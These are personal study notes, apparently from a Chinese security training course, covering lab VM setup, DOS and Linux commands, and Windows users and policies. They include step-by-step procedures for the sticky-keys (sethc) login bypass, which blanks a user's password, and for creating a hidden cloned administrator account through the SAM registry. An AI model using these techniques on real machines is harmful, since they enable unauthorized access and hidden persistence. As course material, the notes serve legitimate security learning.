toc-level-3"><a class="toc-link" href="#Win7"><span class="toc-text">Win7</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Kali"><span class="toc-text">Kali</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D-MS17-010"><span class="toc-text">永恒之蓝 MS17-010</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E2%80%93CVE-2022-32991%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-text">SQL注入–CVE-2022-32991漏洞复现</span></a></li></ol></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="培训"><a href="#培训" class="headerlink" title="培训"></a>培训</h1><h2 id="第一天-开班准备"><a href="#第一天-开班准备" class="headerlink" title="第一天 开班准备"></a>第一天 开班准备</h2><h3 id="学习寄语"><a href="#学习寄语" class="headerlink" title="学习寄语"></a>学习寄语</h3><pre><code class="hljs 1c"><span class="hljs-meta"># 班主任：大麦老师；助教老师：陈老师；培训对接老师：魏老师</span>
<span class="hljs-meta"># 王老师</span>
学习：勤学多练，要理解不要背，有的放矢，有问题尽量当天解决，
要求<span class="hljs-number">1</span>：（C）当前老师上课的实操要全部跟着操作完；（B）课后要熟练上课的实操内容；（A）做到举一反三
要求<span class="hljs-number">2</span>：当天作业尽量当天交，考勤要注意
<span class="hljs-meta"># 张老师（第一阶段教学）</span>
课程：系统（Windows<span class="hljs-meta">&amp;Linux），网络，开发</span>
<span class="hljs-meta"># 肖老师（第二阶段教学）</span>
课程：
<span class="hljs-meta"># 叶老师（第三阶段教学）</span>
课程：安全产品、安全服务，等保测评，安全加固，应急响应流程，防火墙，WAF，态势感知，堡垒机，企业如何使用安全产品保护IT资产，
<span class="hljs-meta"># 上课制度</span>
课程时长：学习四个月（<span class="hljs-number">3</span><span class="hljs-punctuation">-</span><span class="hljs-number">4</span>阶段考核）
上课时间：周一到周五，上午<span class="hljs-number">9</span><span class="hljs-punctuation">:</span><span class="hljs-number">00</span><span class="hljs-punctuation">-</span><span class="hljs-number">12</span><span class="hljs-punctuation">:</span><span class="hljs-number">00</span>，下午<span class="hljs-number">14</span><span class="hljs-punctuation">:</span><span class="hljs-number">00</span><span class="hljs-punctuation">-</span><span class="hljs-number">18</span><span class="hljs-punctuation">:</span><span class="hljs-number">00</span>，晚上<span class="hljs-number">18</span><span class="hljs-punctuation">:</span><span class="hljs-number">00</span><span class="hljs-punctuation">-</span><span class="hljs-number">22</span><span class="hljs-punctuation">:</span><span class="hljs-number">00</span>（自习时间）
<span class="hljs-meta"># 韩老师-就业老师</span>
岗位，未来规划
<span class="hljs-meta"># 小白老师-学习方法</span>
雷锋精神：无私奉献（开源），坚持，有底线
多向老师请教，
<span class="hljs-meta"># 陈老师-助教老师</span>
看完要多练习，根据理解去学习，可以加上自己的理解去做
<span class="hljs-meta"># 大麦班主任-学习方法</span>
多学多问，
复制代码</code></pre>

<h3 id="资料下载"><a href="#资料下载" class="headerlink" title="资料下载"></a>资料下载</h3><pre><code class="hljs">镜像：
工具：
复制代码</code></pre>

<h3 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h3><p>Windows非家庭版安装&amp;激活</p>
<p>VMware安装&amp;配置</p>
<p>VPN工具安装&amp;配置</p>
<p>FTP工具安装&amp;配置</p>
<h2 id="第二天-桌面虚拟环境"><a href="#第二天-桌面虚拟环境" class="headerlink" title="第二天 桌面虚拟环境"></a>第二天 桌面虚拟环境</h2><h3 id="Windows7"><a href="#Windows7" class="headerlink" title="Windows7"></a>Windows7</h3><pre><code class="hljs bash"><span class="hljs-comment"># VM16pro，安装系统2C4G60G，删除打印机，工作网络，稍后提示，mz/aa</span>
Windows7 企业版
<span class="hljs-comment"># 安装VM Tools工具的补丁</span>
windows6.1-kb4474419-v3-x64_b5614c6cea5cb4e198717789633dca16308ef79c.msu
<span class="hljs-comment"># 禁用 Windows update</span>
services.msc
启动类型：禁用；恢复：无操作
<span class="hljs-comment"># 关闭 配置自动更新</span>
gpedit.msc
管理模版 &gt; Windows组件 &gt; Windows Uupdate &gt;&gt; 配置自动更新 （已禁用）
<span class="hljs-comment"># 关闭防火墙</span>
控制面板\系统和安全\Windows 防火墙\自定义设置
<span class="hljs-comment"># 压缩出一个D盘30G左右</span>
<span class="hljs-comment"># 克隆多一台WIn7虚拟机，并修改主机名mz-PC2</span>
</code></pre>

<h3 id="WinServer2019"><a href="#WinServer2019" class="headerlink" title="WinServer2019"></a>WinServer2019</h3><pre><code class="hljs bash"><span class="hljs-comment"># 桌面体验版，30G系统盘，aA1234</span>
D潘
<span class="hljs-comment"># 桌面优化</span>
图标
<span class="hljs-comment"># VMTools</span>
安装 VMTools
<span class="hljs-comment"># 关闭防火墙</span>
控制面板\系统和安全\Windows 防火墙\自定义设置
<span class="hljs-comment"># 关闭更新</span>
gpedit.msc
管理模版 &gt; Windows组件 &gt; Windows Uupdate &gt;&gt; 配置自动更新 （已禁用）
<span class="hljs-comment"># 无须按 Ctrl + Alt + Del交互式登录</span>
gpedit.msc &gt; Windows设置 &gt; 安全设置 &gt; 本地策略 &gt; 安全选项 &gt; 交互式登陆：无须按Ctrl + Alt + Del （已启用）
<span class="hljs-comment"># 快照</span>

<span class="hljs-comment"># 克隆&amp;修改主机名</span>
</code></pre>

<h3 id="VM网络模式"><a href="#VM网络模式" class="headerlink" title="VM网络模式"></a>VM网络模式</h3><pre><code class="hljs routeros">桥接<span class="hljs-built_in"></span>
<span class="hljs-built_in">NAT</span>
<span class="hljs-built_in"></span>仅主机模式
复制代码</code></pre>

<h3 id="Dos命令"><a href="#Dos命令" class="headerlink" title="Dos命令"></a>Dos命令</h3><pre><code class="hljs bash"><span class="hljs-comment">### help = command /?</span>

<span class="hljs-comment"># 修改字体颜色</span>
color 0a

<span class="hljs-comment">## dir</span>
<span class="hljs-comment"># 查看当前目录文件</span>
<span class="hljs-built_in">dir</span>
<span class="hljs-comment"># 只显示名字</span>
<span class="hljs-built_in">dir</span> /w
<span class="hljs-comment"># 显示当前目录和子目录的所以文件</span>
<span class="hljs-built_in">dir</span> /s
<span class="hljs-comment"># 显示当前目录和子目录的所以文件 / 翻页</span>
dis /s/p
<span class="hljs-comment"># 查看隐藏文件</span>
<span class="hljs-built_in">dir</span> /a
<span class="hljs-comment"># 模糊查询, ?代表一个单词</span>
<span class="hljs-built_in">dir</span> de?ktop
<span class="hljs-comment"># 模糊查询2，*代表多个单词</span>
<span class="hljs-built_in">dir</span> d*
<span class="hljs-comment"># 模糊查询3，空格需要要&quot;&quot;包裹</span>
<span class="hljs-built_in">dir</span> <span class="hljs-string">&quot;desk top&quot;</span>

<span class="hljs-comment">## cd</span>
<span class="hljs-comment"># 进入目录, cd [.|..|path]</span>
<span class="hljs-built_in">cd</span> path
<span class="hljs-comment"># 返回盘符目录，即根目录</span>
<span class="hljs-built_in">cd</span> /
<span class="hljs-comment"># 直接跨盘符调整指定目录            --todo     在D盘如何直接跨盘调整到C指定目录--</span>
<span class="hljs-built_in">cd</span> /d [盘符]

<span class="hljs-comment">## md 创建目录</span>
<span class="hljs-comment"># 创建单层目录</span>
md <span class="hljs-built_in">test</span>
<span class="hljs-comment"># 创建多层目录</span>
md a/b/c

<span class="hljs-comment">## cd&gt; 创建文件</span>
<span class="hljs-comment"># 创建aa.txt文件</span>
<span class="hljs-built_in">cd</span>&gt; aa.txt
<span class="hljs-comment"># 在a路径下创建aa.txt文件</span>
<span class="hljs-built_in">cd</span>&gt; a\aa.txt

<span class="hljs-comment">## echo 编写内容</span>
<span class="hljs-comment"># 往aa.txt文件覆盖写入内容whoami</span>
<span class="hljs-built_in">echo</span> <span class="hljs-built_in">whoami</span> &gt; aa.txt
<span class="hljs-comment"># 往aa.txt文件追加写入内容whoami</span>
<span class="hljs-built_in">echo</span> <span class="hljs-built_in">whoami</span> &gt;&gt; aa.txt
<span class="hljs-comment"># 往a目录下的aa.txt文件覆盖写入内容whoami</span>
<span class="hljs-built_in">echo</span> <span class="hljs-built_in">whoami</span> &gt; a\aa.txt

<span class="hljs-comment">## type 查看文件内容</span>
<span class="hljs-comment"># 查看aa.txt文件内容</span>
<span class="hljs-built_in">type</span> aa.txt

<span class="hljs-comment">## copy 复制文件</span>
<span class="hljs-comment"># 将aa.txt文件拷贝到test目录中</span>
copy aa.txt <span class="hljs-built_in">test</span>
<span class="hljs-comment"># 拷贝test目录下的aa.txt文件到根目录并修改为bb.txt文件</span>
copy <span class="hljs-built_in">test</span>\aa.txt bb.txt

<span class="hljs-comment">## ren 修改文件名称</span>
<span class="hljs-comment"># 将 bb.txt 修改为 cc.txt</span>
ren bb.txt cc.txt
<span class="hljs-comment"># 将test目录下的aa.txt 修改为bb.txt [后面不需要指定目录]</span>
ren <span class="hljs-built_in">test</span>\aa.txt bb.txt

<span class="hljs-comment">## rd 删除目录</span>
<span class="hljs-comment"># 删除 test目录[需要确认]</span>
rd /s <span class="hljs-built_in">test</span>
<span class="hljs-comment"># 确定删除test目录</span>
rd /s/q <span class="hljs-built_in">test</span>

<span class="hljs-comment">## del 删除文件</span>
<span class="hljs-comment"># 删除 aa.txt 文件</span>
del aa.txt

<span class="hljs-comment">### 其他</span>
<span class="hljs-comment">## cls 清屏</span>
<span class="hljs-comment">## ver 查看当前dos版本</span>
<span class="hljs-comment">## chkdsk 检查当前磁盘，chkdsk d: 检查D盘</span>
<span class="hljs-comment">## time 显示时间</span>
<span class="hljs-comment">## date 显示日期</span>
<span class="hljs-comment">## certmgr 证书管理窗口</span>
<span class="hljs-comment">## mstsc 打开远程窗口</span>
<span class="hljs-comment">## explorer 文件管理器</span>
<span class="hljs-comment">## calc 计时器工具</span>
<span class="hljs-comment">## cleanmgr 磁盘清理工具</span>
<span class="hljs-comment">## gpedit 本地组策略编辑器</span>
<span class="hljs-comment">## lusrmgr 本地用户和组</span>
<span class="hljs-comment">## notepad 打开记事本</span>
<span class="hljs-comment">## regedit 注册表</span>
<span class="hljs-comment">## sfc 检查文件， sfc /SCANNOW </span>
<span class="hljs-comment">## taskmgr 任务管理器</span>
<span class="hljs-comment">## write 写字板</span>
<span class="hljs-comment">## help 查看有什么命令</span>

<span class="hljs-comment">## ipconfig 查看IP地址</span>
ipconfig
ipconfig /all

<span class="hljs-comment">## nslookup 查看DNS解析</span>
nslookup baidu.com

<span class="hljs-comment">## ping 默认ping 4次</span>
ping baidu.com -t <span class="hljs-comment"># 一直ping</span>
ping baidu.com -n 10 <span class="hljs-comment"># ping 10 次</span>
ping baidu.com -l 1464 <span class="hljs-comment"># 指定ping包大小为10字节 [有些网站现在ping包大小]</span>
</code></pre>

<h3 id="cisp-practise01"><a href="#cisp-practise01" class="headerlink" title="cisp-practise01"></a><a href="https://hjxstart.github.io/2025/08/21/cisp-practice01/">cisp-practise01</a></h3><h2 id="第三天-Windows"><a href="#第三天-Windows" class="headerlink" title="第三天 Windows"></a>第三天 Windows</h2><pre><code class="hljs gradle">Windowe系统格式：CDFS<span class="hljs-regexp">/UDF/</span>FAT12<span class="hljs-regexp">/FAT16/</span>FAT32/NTFS
NTFS (<span class="hljs-keyword">New</span> Technology <span class="hljs-keyword">File</span> System 新技术文件系统)
复制代码</code></pre>

<h3 id="权限"><a href="#权限" class="headerlink" title="权限"></a>权限</h3><pre><code class="hljs bash">默认继承权限；可以通过禁用继承，修改权限和主体；
aa/bb: 如果aa禁用了继承，并修改权限；bb没有禁用继承，则bb会继承aa的权限；
cc/dd：如果<span class="hljs-built_in">dd</span>禁用了继承，并修改权限；cc没有禁用继承，<span class="hljs-built_in">dd</span>的权限保持不变；
复制代码</code></pre>

<h3 id="用户"><a href="#用户" class="headerlink" title="用户"></a>用户</h3><pre><code class="hljs bash"><span class="hljs-comment"># Win7密码保存地址：C:\Windows\System32\config\SAM；hash加密了</span>
0、账号的编号
Administrator	500
Guest	501

1、查看用户
<span class="hljs-built_in">whoami</span> /user <span class="hljs-comment"># 查看当前用户</span>
vmic useraccount get name,sid <span class="hljs-comment"># 查看所以账号的名称和sid</span>
net user  <span class="hljs-comment"># 查看所有用户</span>
net user admin <span class="hljs-comment"># 查看admin用户信息</span>

2、启用或禁用指定用户
net user admin /active:<span class="hljs-built_in">yes</span> <span class="hljs-comment"># 启用admin用户</span>
net user admin /active:no <span class="hljs-comment">#  禁用admin用户</span>

3、命令创建用户
net user mz aa123456 /add  <span class="hljs-comment"># 创建用户mz 密码为aa123456</span>

4、命令重置用户密码
net user mz <span class="hljs-string">&quot;&quot;</span> <span class="hljs-comment"># 将mz用户密码重置为空</span>

5、修改用户密码
net user mz 123456 <span class="hljs-comment"># 将mz用户的密码修改为123456</span>

6、命令删除用户
net user mz /del <span class="hljs-comment"># 删除mz用户</span>
</code></pre>

<h3 id="组"><a href="#组" class="headerlink" title="组"></a>组</h3><pre><code class="hljs bash"><span class="hljs-comment"># 组：Guest、Users</span>
1、查看组
net localgroup <span class="hljs-comment"># 查看本地用户组</span>
2、命令创建组
net localgroup group1 /add <span class="hljs-comment"># 创建group1组</span>
3、命令删除组
net localgroup group1 /del <span class="hljs-comment"># 删除group1组</span>
4、命令添加用户到指定组
net localgroup group1 mz /add <span class="hljs-comment"># 将用户mz加入group1组</span>
5、把指定用户踢出组
net localgroup group1 mz /del <span class="hljs-comment"># 将用户mz移出group1组</span>
</code></pre>

<h3 id="5次shift漏洞"><a href="#5次shift漏洞" class="headerlink" title="5次shift漏洞"></a>5次shift漏洞</h3><pre><code class="hljs bash"><span class="hljs-comment"># 唤醒程序路径：C:\Windows\System32\sethc</span>
<span class="hljs-comment"># 复现方法：先关机重启，看到windows图标，直接在VM上关闭客户机（模拟开机时断断电源操作），再重启虚拟机，一定要看到“启动启动修复（推荐）”，回车；取消还原，查看“隐藏问题详细信息”，打开“X:\windows\system32\zh-CN\erofflps.txt”，在记事本中文件&gt;打开，文件类型选择所有文件，将sethc修改为sethce，将cmd复制一份并修改为sethc，之后关闭窗口点击完成关机，再开机，点击用户登陆，按5次shift按键，在CMD窗口执行net user username &quot;&quot;，设置无密码即可登录。</span>
</code></pre>



<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250823114649243.png" alt="sethc"></p>
<p>sethc</p>
<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250823114952907.png" alt="5次shift漏洞"></p>
<p>5次shift漏洞</p>
<h3 id="安全策略"><a href="#安全策略" class="headerlink" title="安全策略"></a>安全策略</h3><pre><code class="hljs 1c">gpedit.msc &gt; Windows设置 &gt; 账号策略 &gt; 密码策略 （密码长度，复杂性，默认（密码最长使用时间<span class="hljs-number">42</span>天，最短<span class="hljs-number">0</span>天），强制密码历史次数）
gpedit.msc &gt; Windows设置 &gt; 账号策略 &gt; 账号锁定策略 （锁定时间，锁定阈值：<span class="hljs-number">3</span>次无效登录，重置锁定计数器）
<span class="hljs-meta"># 本地日志 （使用事件查看器，eventvwr.msc）</span>
gpedit.msc &gt; Windows设置 &gt; 本地策略 （登录记录，系统时间等）
复制代码</code></pre>

<h3 id="Windows隐藏账号"><a href="#Windows隐藏账号" class="headerlink" title="Windows隐藏账号"></a>Windows隐藏账号</h3><pre><code class="hljs bash">net user <span class="hljs-built_in">test</span>$ aa /add <span class="hljs-comment"># 创建一个test$用户</span>
net localgroup administrators <span class="hljs-built_in">test</span>$ /add <span class="hljs-comment"># 添加到administrators 组中</span>
net user administrator /active:<span class="hljs-built_in">yes</span> <span class="hljs-comment"># 激活administrator账号</span>
<span class="hljs-comment"># 在本地用户和组中删除test$</span>
regedit <span class="hljs-comment"># 打开注册表</span>
1、打开HKEY_LOCAL_MACHINE/SAM/SAM，右键“权限”，将administrators组更新完成控制权限，刷新注册表（查看，刷新）；
2、继续打开HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Users/Names
3、导出administrator的uuid注册表到桌面，Users/000001F4命名为admini_uuid
4、导出<span class="hljs-built_in">test</span>$的uuid注册表到桌面，Users/000003E9命名为test_uuid
5、导出<span class="hljs-built_in">test</span>$的name注册表到桌面，Users/Names/test$命名为<span class="hljs-built_in">test</span>
6、编辑admini_uuid，拷贝F值到test_uuid的导出注册表中
7、命令删除<span class="hljs-built_in">test</span>$用户：net user <span class="hljs-built_in">test</span>$ /del，刷新检查注册表和本地用户中都没有<span class="hljs-built_in">test</span>$用户了
8、导入<span class="hljs-built_in">test</span>$注册表：先右键<span class="hljs-built_in">test</span>的注册表选择合并，在右键test_uuid的注册表选择合并，刷新检查注册表有<span class="hljs-built_in">test</span>的账号信息了
9、设置“不显示登录用户名登录”：gpedit.msc &gt; Windows设置 &gt; 安全设置 &gt; 本地策略 &gt; 安全选项 &gt; <span class="hljs-string">&quot;交互式登录：不显示最后的用户名&quot;</span>
</code></pre>

<h3 id="cisp-practise02"><a href="#cisp-practise02" class="headerlink" title="cisp-practise02"></a><a href="https://hjxstart.github.io/2025/08/22/cisp-practice02/">cisp-practise02</a></h3><h3 id="cisp-practise03"><a href="#cisp-practise03" class="headerlink" title="cisp-practise03"></a><a href="https://hjxstart.github.io/2025/08/23/cisp-practice03/">cisp-practise03</a></h3><h2 id="第四天-Linux"><a href="#第四天-Linux" class="headerlink" title="第四天 Linux"></a>第四天 Linux</h2><h3 id="Centos7-安装"><a href="#Centos7-安装" class="headerlink" title="Centos7 安装"></a>Centos7 安装</h3><h3 id="Centos7网络配置"><a href="#Centos7网络配置" class="headerlink" title="Centos7网络配置"></a>Centos7网络配置</h3><pre><code class="hljs bash"></code></pre>

<h3 id="Centos7-更换Yum源"><a href="#Centos7-更换Yum源" class="headerlink" title="Centos7 更换Yum源"></a>Centos7 更换Yum源</h3><pre><code class="hljs bash"><span class="hljs-comment"># 更换阿里源</span>
curl -o /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-7.repo
<span class="hljs-comment"># 清理yum缓存</span>
yum clean all
<span class="hljs-comment"># 重新生成缓存</span>
yum makecache
</code></pre>

<h2 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>文件操作</h2><h3 id="配置Centos7"><a href="#配置Centos7" class="headerlink" title="配置Centos7"></a>配置Centos7</h3><pre><code class="hljs bash"><span class="hljs-comment"># 清屏</span>
clear
<span class="hljs-comment"># 设置字体</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;setfont LatGrkCyr-12x22&#x27;</span> &gt;&gt; /etc/bashrc
<span class="hljs-comment"># 修改源</span>
curl -o /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-7.repo
yum clean all
yum makecache
<span class="hljs-comment"># 安装工具</span>
yum install wget -y <span class="hljs-comment"># wget下载</span>
yum install -y net-tools  <span class="hljs-comment"># ifconfig</span>
yum install -y bind-utils <span class="hljs-comment"># nslookup</span>
yum install -y vim-enhanced <span class="hljs-comment"># vim</span>
yum install -y tree <span class="hljs-comment"># tree --help | more 翻页</span>
<span class="hljs-comment"># 防火墙命令</span>
systemctl stop firewalld <span class="hljs-comment"># 查看防火墙状态</span>
systemctl <span class="hljs-built_in">disable</span> firewalld <span class="hljs-comment"># 禁止开机自启动</span>
systemctl status firewalld <span class="hljs-comment"># 查看防火墙状态</span>
<span class="hljs-comment"># 关闭selinux</span>
<span class="hljs-built_in">cp</span> /etc/selinux/config /etc/selinux/config.bak <span class="hljs-comment"># 备份selinux备份</span>
vim /etc/selinux/config <span class="hljs-comment"># 将 enforcing 修改为 disabled </span>
getenforce <span class="hljs-comment"># 检查 selinux是否是 disabled 状态</span>
<span class="hljs-comment"># tree命令</span>
tree / -L 1
<span class="hljs-comment"># file</span>
file 命令可以判断文件类型
<span class="hljs-comment"># ls命令</span>
<span class="hljs-built_in">ls</span> -i <span class="hljs-comment"># index 索引</span>
<span class="hljs-built_in">ls</span> -alh
</code></pre>

<h3 id="目录结构"><a href="#目录结构" class="headerlink" title="目录结构"></a>目录结构</h3><pre><code class="hljs axapta">bin <span class="hljs-meta"># 二进制</span>
boot <span class="hljs-meta"># 启动，内核</span>
dev <span class="hljs-meta"># 设备</span>
etc <span class="hljs-meta"># 配置文件</span>
home <span class="hljs-meta"># 其他用户家目录</span>
lib <span class="hljs-meta"># 系统库 链接文件</span>
mnt <span class="hljs-meta"># 挂载</span>
opt <span class="hljs-meta"># 大的安装</span>
root <span class="hljs-meta"># root用户家目录</span>
<span class="hljs-built_in">var</span> <span class="hljs-meta"># 网页</span>
tmp <span class="hljs-meta"># 临时文件</span>
sys <span class="hljs-meta"># 文件系统</span>
srv <span class="hljs-meta">#</span>
复制代码</code></pre>

<h3 id="Linux文件类型–file"><a href="#Linux文件类型–file" class="headerlink" title="Linux文件类型–file"></a>Linux文件类型–file</h3><pre><code class="hljs bash">text 文件
shell script <span class="hljs-comment"># shell 脚本 </span>
executable <span class="hljs-comment"># 可执行</span>
data <span class="hljs-comment"># 数据</span>
directory <span class="hljs-comment"># 目录</span>
empty <span class="hljs-comment"># 空</span>
复制代码
<span class="hljs-comment"># 文件</span>
<span class="hljs-built_in">touch</span> aa.txt <span class="hljs-comment"># 创建文件</span>
<span class="hljs-built_in">echo</span> <span class="hljs-built_in">whoami</span> &gt; aa.txt <span class="hljs-comment"># 查看文件</span>
file aa.txt <span class="hljs-comment"># text</span>

<span class="hljs-comment"># 目录</span>
<span class="hljs-built_in">mkdir</span> <span class="hljs-built_in">test</span> <span class="hljs-comment"># 创建test目录</span>
<span class="hljs-built_in">mkdir</span> -p a/b/c <span class="hljs-comment"># 创建多层级目录</span>
<span class="hljs-built_in">rm</span> -r <span class="hljs-built_in">test</span> <span class="hljs-comment"># 删除test目录</span>
<span class="hljs-built_in">rm</span> -rf a <span class="hljs-comment"># 删除a目录，不用回复yes</span>
<span class="hljs-built_in">mv</span> a <span class="hljs-built_in">test</span> <span class="hljs-comment"># 将a目录移动到test下</span>
<span class="hljs-built_in">mv</span> <span class="hljs-built_in">test</span>/a /root/b <span class="hljs-comment"># 将test目录下的a，移动到/root下，并改名称为b</span>

Ctrl + D <span class="hljs-comment"># 输入结束</span>
Ctrl + S <span class="hljs-comment"># 暂停屏幕输出</span>
Ctrl + U <span class="hljs-comment"># 在提示符下，将整行命令删除</span>
Ctrl + Z <span class="hljs-comment"># 暂停当前任务</span>
复制代码</code></pre>

<h3 id="文件压缩和备份"><a href="#文件压缩和备份" class="headerlink" title="文件压缩和备份"></a>文件压缩和备份</h3><pre><code class="hljs bash"><span class="hljs-comment">## bzip2 命令：用于创建和管理（包括解压缩）&quot;.bz2&quot;格式的压缩包</span>
<span class="hljs-comment"># bzip2 [选项] [要压缩的文件]</span>
<span class="hljs-comment"># .bz2 文件的压缩程序，并删除原始的文件</span>
<span class="hljs-comment"># 压缩</span>
bzip2 aa.txt <span class="hljs-comment"># 不保留原文件，生成aa.txt.bz2 压缩文件</span>
bzip2 -k bb.txt <span class="hljs-comment"># 保留原文件，生成bb.txt.bz2 压缩文件</span>
<span class="hljs-comment"># 解压</span>
bzip2 -d aa.txt.bz2 <span class="hljs-comment"># 解压文件，不保留压缩包</span>
bzip2 -tv bb.txt.bz2 <span class="hljs-comment"># 测试完整性，没有返回就没有问题，可选：v是可视化，f是强制替换现有的文件</span>

<span class="hljs-comment">## gzip</span>
<span class="hljs-comment"># 压缩</span>
gzip aa.txt bb.txt <span class="hljs-comment"># 分别压缩aa.txt.gz, bb.txt.gz，原文件不保留</span>
gzip -l bb.txt.gz <span class="hljs-comment"># 列出压缩包内容</span>
gzip -c cc.txt <span class="hljs-comment"># 标准输出（取巧）</span>
gzip -r <span class="hljs-built_in">test</span> <span class="hljs-comment"># 递归，st目录下的文件分别压缩，可以使用drv，递归解压</span>
<span class="hljs-comment"># 解压</span>
gzip -d bb.txt.gz <span class="hljs-comment"># 解压缩文件，可选：f强制解压，v是可视化</span>

<span class="hljs-comment">## tar 打包（备份作用），f 文件是必备参数(该参数要放在最后)，(可以打包目录)</span>
<span class="hljs-comment"># 打包</span>
tar -cf txt.tar *.txt <span class="hljs-comment"># c是创建，txt.tar打包后的文件名，*.txt是要打包的文件</span>
tar -tf txt.tar <span class="hljs-comment"># t是查看压缩包里面的内容</span>
<span class="hljs-comment"># 解包</span>
tar -xf txt.tar <span class="hljs-comment"># 保留压缩包，解压到当前路径</span>
<span class="hljs-comment"># 压缩(z=gz, j=bz2)</span>
tar -czf txt.tar.gz *.txt
tar -cjf txt.tar.bz2 *.txt
<span class="hljs-comment"># 解压</span>
tar -xzf txt.tar.gz
tar -xjf txt.tar.bz2 
</code></pre>

<h3 id="其他命令"><a href="#其他命令" class="headerlink" title="其他命令"></a>其他命令</h3><pre><code class="hljs bash"><span class="hljs-comment"># which [] 命令 ： 查看命令的环境变量</span>

<span class="hljs-comment"># uname 显示 linux 体系结构和内核版本</span>
<span class="hljs-built_in">uname</span> <span class="hljs-comment"># linux</span>
<span class="hljs-built_in">uname</span> -a <span class="hljs-comment"># 查看所有信息</span>
<span class="hljs-built_in">uname</span> -m <span class="hljs-comment"># 显示电脑类型 x86_64</span>
<span class="hljs-built_in">uname</span> -n <span class="hljs-comment"># 主机名称</span>
<span class="hljs-built_in">uname</span> -r <span class="hljs-comment"># 发行编号，不是版本号</span>
<span class="hljs-built_in">uname</span> -v <span class="hljs-comment"># 版本号</span>
<span class="hljs-built_in">uname</span> -s <span class="hljs-comment"># 操作系统名称</span>
<span class="hljs-built_in">uname</span> -p <span class="hljs-comment"># 处理器 x86_64</span>
<span class="hljs-built_in">uname</span> -i <span class="hljs-comment"># 硬件平台 x86_64</span>
<span class="hljs-built_in">uname</span> -io <span class="hljs-comment"># 操作系统名称</span>

<span class="hljs-comment"># service 命令，旧版本的systemctl (更强大)</span>
service [start|stop|restatus|reload|status] service_name

<span class="hljs-comment"># systemctl service_name [start|stop|restatus|reload|status]</span>
systemctl show firewalld
systemctl mask firewalld <span class="hljs-comment"># 注销（无法通过命令启动，可以需要unmask找回来启动）</span>
<span class="hljs-comment"># 服务状态</span>
static : 不可以自己启动，需要enabled服务来唤醒
mask : 注销，无法启动，可以通过systemctl unmask 恢复原来的状态
active (exited) : 仅执行一次就正常结束的服务
active (waiting) : 正在执行当中，不过还再等待其他的时间才能继续处理。例如打印机相关服务的状态

<span class="hljs-comment"># cut 命令，剪</span>
<span class="hljs-comment"># 文件aa.txt文件如下, 分隔符可以是空格，逗号等</span>
1	2	3
4	5	6
<span class="hljs-comment"># cut -d &#x27;	&#x27; -f 1 aa.txt</span>
1
4
<span class="hljs-comment"># cut -d &#x27;	&#x27; -f 1-2 aa.txt</span>
1	2
4	5
<span class="hljs-built_in">cut</span> -d : -f 1,3 /etc/passwd <span class="hljs-comment"># 只显示第1,3列</span>

<span class="hljs-comment"># 标准输入，输入重定向</span>
<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;hello word \nhello kylin&quot;</span> &gt; aa
<span class="hljs-built_in">wc</span> -l &lt; aa.txt &gt; bb.txt
<span class="hljs-built_in">cat</span> bb.tt <span class="hljs-comment"># 2</span>


<span class="hljs-comment"># 多命令执行方式。可以；&amp;&amp; || 之间混合使用</span>
command1;command2;command3 <span class="hljs-comment"># 顺序执行，命令错误也会执行后面</span>
command1&amp;&amp;command2&amp;&amp;command3 <span class="hljs-comment"># 顺序执行，前面有错误后面不会执行</span>
command1 || command2 || command3 <span class="hljs-comment"># 命令1错执行命令2，命令2错执行命令3，命令1正确后面不执行</span>
command1 | command2 | command3 <span class="hljs-comment">#  管道符作用，只显示最后一个命令结果</span>


<span class="hljs-comment"># 痕迹命令</span>
w <span class="hljs-comment"># tty实时登录信息 , tty命令查看当前tty编号，Logname查看原始登录的用户（切换用户的情况）</span>
<span class="hljs-built_in">who</span> <span class="hljs-comment"># 和w差不多，更简洁</span>
last <span class="hljs-comment"># 最近登录信息，显示远程登录ip</span>
lastlog <span class="hljs-comment"># 最后登录时间</span>
lastb <span class="hljs-comment"># 查看最近登录失败的信息（密码错误，或者账号错误）</span>
</code></pre>

<h3 id="VIM-编辑工具"><a href="#VIM-编辑工具" class="headerlink" title="VIM 编辑工具"></a>VIM 编辑工具</h3><pre><code class="hljs bash">命令模式:
<span class="hljs-built_in">dd</span> 剪切      <span class="hljs-built_in">dd</span> + p  剪切后粘贴
yy 复制	  yy + 3p 复制后粘贴3行
u  撤销
ctl+r 恢复撤销

末行模式:
wq 保存
wq! 强制保存
q 退出
q! 强制退出
/字符串  查找改字符串
/^字符	查找以改字符为开头的
/字符$	查找以改字符为结尾的
<span class="hljs-built_in">set</span> nu 显示行号
<span class="hljs-built_in">set</span> nonu 取消行号
</code></pre>

<h3 id="文件权限-用户"><a href="#文件权限-用户" class="headerlink" title="文件权限&amp;用户"></a>文件权限&amp;用户</h3><pre><code class="hljs bash">目录：755
文件：644
<span class="hljs-built_in">chmod</span> 755 <span class="hljs-built_in">dir</span>
<span class="hljs-built_in">chmod</span> 655 file
<span class="hljs-built_in">chown</span> user:group <span class="hljs-built_in">test</span>
<span class="hljs-comment"># 特殊权限</span>
<span class="hljs-built_in">sudo</span> 借用root权限
SUID: 借用User的权限，只在文件
SGID: 借用group的权限，

<span class="hljs-built_in">id</span> username <span class="hljs-comment"># 查看uid</span>
<span class="hljs-comment"># 创建用户</span>
useradd mz
passwd aa
su mz
su
userdel -rf mz <span class="hljs-comment"># 删除用户和文件</span>

groupadd group_1
groupdel -f group_1
<span class="hljs-comment"># 添加到用户到组，或者删除</span>
gpasswd -a user group
gpsswd -d user group

